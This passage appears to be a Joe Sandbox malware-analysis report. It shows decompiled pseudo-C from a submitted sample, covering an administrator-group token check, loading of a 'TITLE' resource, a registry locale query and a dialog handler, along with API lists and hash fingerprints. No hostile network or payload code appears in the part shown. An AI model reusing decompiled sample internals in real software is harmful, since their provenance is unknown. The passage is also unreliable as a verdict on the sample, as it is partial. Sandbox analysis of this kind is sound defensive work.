                                                                                                                                                                                                      					return E00E76CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E00E717EE( &_v20) != 0) {
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                                                                      						 *0xe78128 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                      					CloseHandle(_v28);
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_pop(_t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                      						L15:
                                                                                                                                                                                                      						LocalFree(_t52);
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if( *_t52 <= 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							FreeSid(_v32);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                      						_t50 = _t15;
                                                                                                                                                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                      							_t45 = _t45 + 1;
                                                                                                                                                                                                      							_t50 = _t50 + 8;
                                                                                                                                                                                                      							if(_t45 <  *_t52) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe78128 = 1;
                                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00e718a3
                                                                                                                                                                                                      0x00e718a3
                                                                                                                                                                                                      0x00e718ab
                                                                                                                                                                                                      0x00e718b2
                                                                                                                                                                                                      0x00e718b5
                                                                                                                                                                                                      0x00e718be
                                                                                                                                                                                                      0x00e718c0
                                                                                                                                                                                                      0x00e718c6
                                                                                                                                                                                                      0x00e718c7
                                                                                                                                                                                                      0x00e718ca
                                                                                                                                                                                                      0x00e718cf
                                                                                                                                                                                                      0x00e719c9
                                                                                                                                                                                                      0x00e719d8
                                                                                                                                                                                                      0x00e719d8
                                                                                                                                                                                                      0x00e718df
                                                                                                                                                                                                      0x00e719b8
                                                                                                                                                                                                      0x00e719bd
                                                                                                                                                                                                      0x00e719bf
                                                                                                                                                                                                      0x00e719bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e719bd
                                                                                                                                                                                                      0x00e718fa
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71912
                                                                                                                                                                                                      0x00e719aa
                                                                                                                                                                                                      0x00e719ad
                                                                                                                                                                                                      0x00e719b3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71927
                                                                                                                                                                                                      0x00e71927
                                                                                                                                                                                                      0x00e71932
                                                                                                                                                                                                      0x00e71936
                                                                                                                                                                                                      0x00e719a9
                                                                                                                                                                                                      0x00e719a9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e719a9
                                                                                                                                                                                                      0x00e7194c
                                                                                                                                                                                                      0x00e719a2
                                                                                                                                                                                                      0x00e719a3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7196e
                                                                                                                                                                                                      0x00e71970
                                                                                                                                                                                                      0x00e71999
                                                                                                                                                                                                      0x00e7199c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7199c
                                                                                                                                                                                                      0x00e71972
                                                                                                                                                                                                      0x00e71972
                                                                                                                                                                                                      0x00e71975
                                                                                                                                                                                                      0x00e71984
                                                                                                                                                                                                      0x00e71985
                                                                                                                                                                                                      0x00e7198a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7198c
                                                                                                                                                                                                      0x00e71991
                                                                                                                                                                                                      0x00e71996
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71996
                                                                                                                                                                                                      0x00e7194c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E718DD), ref: 00E7181A
                                                                                                                                                                                                        • Part of subcall function 00E717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E7182C
                                                                                                                                                                                                        • Part of subcall function 00E717EE: AllocateAndInitializeSid.ADVAPI32(00E718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E718DD), ref: 00E71855
                                                                                                                                                                                                        • Part of subcall function 00E717EE: FreeSid.ADVAPI32(?,?,?,?,00E718DD), ref: 00E71883
                                                                                                                                                                                                        • Part of subcall function 00E717EE: FreeLibrary.KERNEL32(00000000,?,?,?,00E718DD), ref: 00E7188A
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00E718EB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E718F2
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00E7190A
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00E71918
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 00E7192C
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00E71944
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E71964
                                                                                                                                                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 00E7197A
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 00E7199C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00E719A3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E719AD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168512254-0
                                                                                                                                                                                                      • Opcode ID: c5747d213930e95129d214a950f27a1a021bf97732dda3cc400747b09e845de7
                                                                                                                                                                                                      • Instruction ID: b165ed733cb3900f0f5eab2d62ad43475d5a233a254a598f69f64502670862d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5747d213930e95129d214a950f27a1a021bf97732dda3cc400747b09e845de7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99313071A00209AFDB20DFAADC58ABFBBBDFF84704F145465E649F2150D730994ACB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00E7468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				CHAR* _t14;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                      				_t11 = __edx;
                                                                                                                                                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                      				_t16 = _t4;
                                                                                                                                                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                      					if(_t16 == 0) {
                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                      					FreeResource(_t15);
                                                                                                                                                                                                      					return _t16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00e74699
                                                                                                                                                                                                      0x00e7469b
                                                                                                                                                                                                      0x00e746a9
                                                                                                                                                                                                      0x00e746af
                                                                                                                                                                                                      0x00e746b4
                                                                                                                                                                                                      0x00e746bc
                                                                                                                                                                                                      0x00e746f9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e746f9
                                                                                                                                                                                                      0x00e746d9
                                                                                                                                                                                                      0x00e746dd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e746e5
                                                                                                                                                                                                      0x00e746ef
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e746f5
                                                                                                                                                                                                      0x00e746ff

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                      • memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: TITLE$cent
                                                                                                                                                                                                      • API String ID: 3370778649-3553536280
                                                                                                                                                                                                      • Opcode ID: d43b3531486823579e79ec83b207f1517a3fcf2adef58f7efb29beb9d66e162b
                                                                                                                                                                                                      • Instruction ID: 368e01a0bb961dd0bba59b80fcd158b8cb4b7f1e4f8aa44b102e1a163ff3b779
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d43b3531486823579e79ec83b207f1517a3fcf2adef58f7efb29beb9d66e162b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B40186772442107FE31067E69C4DF7F7E2CEBC6B52F084424FA4DB6191DB71888586A6
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00E7681F(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                      				void* _v172;
                                                                                                                                                                                                      				int* _v176;
                                                                                                                                                                                                      				int _v180;
                                                                                                                                                                                                      				int _v184;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                                                                      				_t19 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                      				_t41 =  *0xe781d8; // 0x0
                                                                                                                                                                                                      				_t43 = 0;
                                                                                                                                                                                                      				_v180 = 0xc;
                                                                                                                                                                                                      				_v176 = 0;
                                                                                                                                                                                                      				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                      					 *0xe781d8 = 0;
                                                                                                                                                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      						_t41 =  *0xe781d8; // 0x0
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t41 = 1;
                                                                                                                                                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t31 = RegQueryValueExA(_v172, 0xe71140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                      							_t43 = _t31;
                                                                                                                                                                                                      							RegCloseKey(_v172);
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t40 =  &_v176;
                                                                                                                                                                                                      								if(E00E766F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                      										 *0xe781d8 = _t41;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t18 =  &_v8; // 0xe7463b
                                                                                                                                                                                                      				return E00E76CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00e7681f
                                                                                                                                                                                                      0x00e7682a
                                                                                                                                                                                                      0x00e76831
                                                                                                                                                                                                      0x00e76836
                                                                                                                                                                                                      0x00e7683c
                                                                                                                                                                                                      0x00e7683e
                                                                                                                                                                                                      0x00e76848
                                                                                                                                                                                                      0x00e76851
                                                                                                                                                                                                      0x00e7685d
                                                                                                                                                                                                      0x00e76864
                                                                                                                                                                                                      0x00e76876
                                                                                                                                                                                                      0x00e7693a
                                                                                                                                                                                                      0x00e7693a
                                                                                                                                                                                                      0x00e7687c
                                                                                                                                                                                                      0x00e7687e
                                                                                                                                                                                                      0x00e76885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e768d6
                                                                                                                                                                                                      0x00e768f4
                                                                                                                                                                                                      0x00e76900
                                                                                                                                                                                                      0x00e76902
                                                                                                                                                                                                      0x00e7690a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7690c
                                                                                                                                                                                                      0x00e7690c
                                                                                                                                                                                                      0x00e7691c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7691e
                                                                                                                                                                                                      0x00e76924
                                                                                                                                                                                                      0x00e7692b
                                                                                                                                                                                                      0x00e76932
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7692b
                                                                                                                                                                                                      0x00e7691c
                                                                                                                                                                                                      0x00e7690a
                                                                                                                                                                                                      0x00e76885
                                                                                                                                                                                                      0x00e76876
                                                                                                                                                                                                      0x00e76940
                                                                                                                                                                                                      0x00e76951

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E7686E
                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004A), ref: 00E768A7
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E768CC
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00E71140,00000000,?,?,0000000C), ref: 00E768F4
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E76902
                                                                                                                                                                                                        • Part of subcall function 00E766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00E7691A), ref: 00E76741
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                      • String ID: ;F$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                      • API String ID: 3346862599-574545411
                                                                                                                                                                                                      • Opcode ID: 8098f3f6120a72c205cdeb55fe5280bc270ccdfc32ff7bf80a16caa50919ec1b
                                                                                                                                                                                                      • Instruction ID: 7ea855a4a30f2d42c6a356f8bf42863f23ff720780ce055414594d90cf2b4e9e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8098f3f6120a72c205cdeb55fe5280bc270ccdfc32ff7bf80a16caa50919ec1b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8318F31A017189FDB21CB16DC04BAAB7B9EB8572CF0481A5EA4DB6150DB309E89CF52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E73450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t7 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                                      					EndDialog(_a4, 2);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t7 - 0x100;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					_t12 = GetDesktopWindow();
                                                                                                                                                                                                      					_t24 = _a4;
                                                                                                                                                                                                      					E00E743D0(_t24, _t12);
                                                                                                                                                                                                      					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                      					SetDlgItemTextA(_t24, 0x838,  *0xe79404);
                                                                                                                                                                                                      					SetForegroundWindow(_t24);
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t11 == 1) {
                                                                                                                                                                                                      					_t22 = _a12;
                                                                                                                                                                                                      					if(_t22 < 6) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 <= 7) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						EndDialog(_a4, _t22);
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 != 0x839) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe791dc = 1;
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00e73459
                                                                                                                                                                                                      0x00e7345c
                                                                                                                                                                                                      0x00e734d8
                                                                                                                                                                                                      0x00e734de
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e734e0
                                                                                                                                                                                                      0x00e7345e
                                                                                                                                                                                                      0x00e73463
                                                                                                                                                                                                      0x00e7349a
                                                                                                                                                                                                      0x00e734a0
                                                                                                                                                                                                      0x00e734a7
                                                                                                                                                                                                      0x00e734b2
                                                                                                                                                                                                      0x00e734c4
                                                                                                                                                                                                      0x00e734cb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e734cb
                                                                                                                                                                                                      0x00e73468
                                                                                                                                                                                                      0x00e7346e
                                                                                                                                                                                                      0x00e73474
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7347c
                                                                                                                                                                                                      0x00e7348c
                                                                                                                                                                                                      0x00e73490
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73496
                                                                                                                                                                                                      0x00e73484
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73486
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73486
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00E73490
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E7349A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00E734B2
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 00E734C4
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00E734CB
                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00E734D8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 852535152-3940384054
                                                                                                                                                                                                      • Opcode ID: 23e47f3ffb43eafb2d900c825a20b6d38fcab08670738b09f43f36cce623fdcc
                                                                                                                                                                                                      • Instruction ID: 79dfbd5ff48b550809ed8ef0668bc9539c6f44f0ab2c2d1da21c35d96a8ce02e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e47f3ffb43eafb2d900c825a20b6d38fcab08670738b09f43f36cce623fdcc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D701D231251115AFD75E9F76DC0C8AD3B60EB45702F54D020FA6EB69A0E7318F81EB85
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00E72AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				char _t32;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				char* _t38;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                      				CHAR* _t59;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                      				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                      				_t65 = _a4;
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t64 = __ecx;
                                                                                                                                                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                      					GetModuleFileNameA( *0xe79a3c,  &_v268, 0x104);
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_t17 =  *_t64;
                                                                                                                                                                                                      						if(_t17 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                      						 *_t65 =  *_t64;
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t65[1] = _t64[1];
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *_t64 != 0x23) {
                                                                                                                                                                                                      							L19:
                                                                                                                                                                                                      							_t65 = CharNextA(_t65);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 = CharNextA(_t64);
                                                                                                                                                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                      									if( *_t64 == 0x23) {
                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00E71680(_t65, E00E717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      									_t52 = _t65;
                                                                                                                                                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                      									_t60 = _t14;
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										_t32 =  *_t52;
                                                                                                                                                                                                      										_t52 =  &(_t52[1]);
                                                                                                                                                                                                      									} while (_t32 != 0);
                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
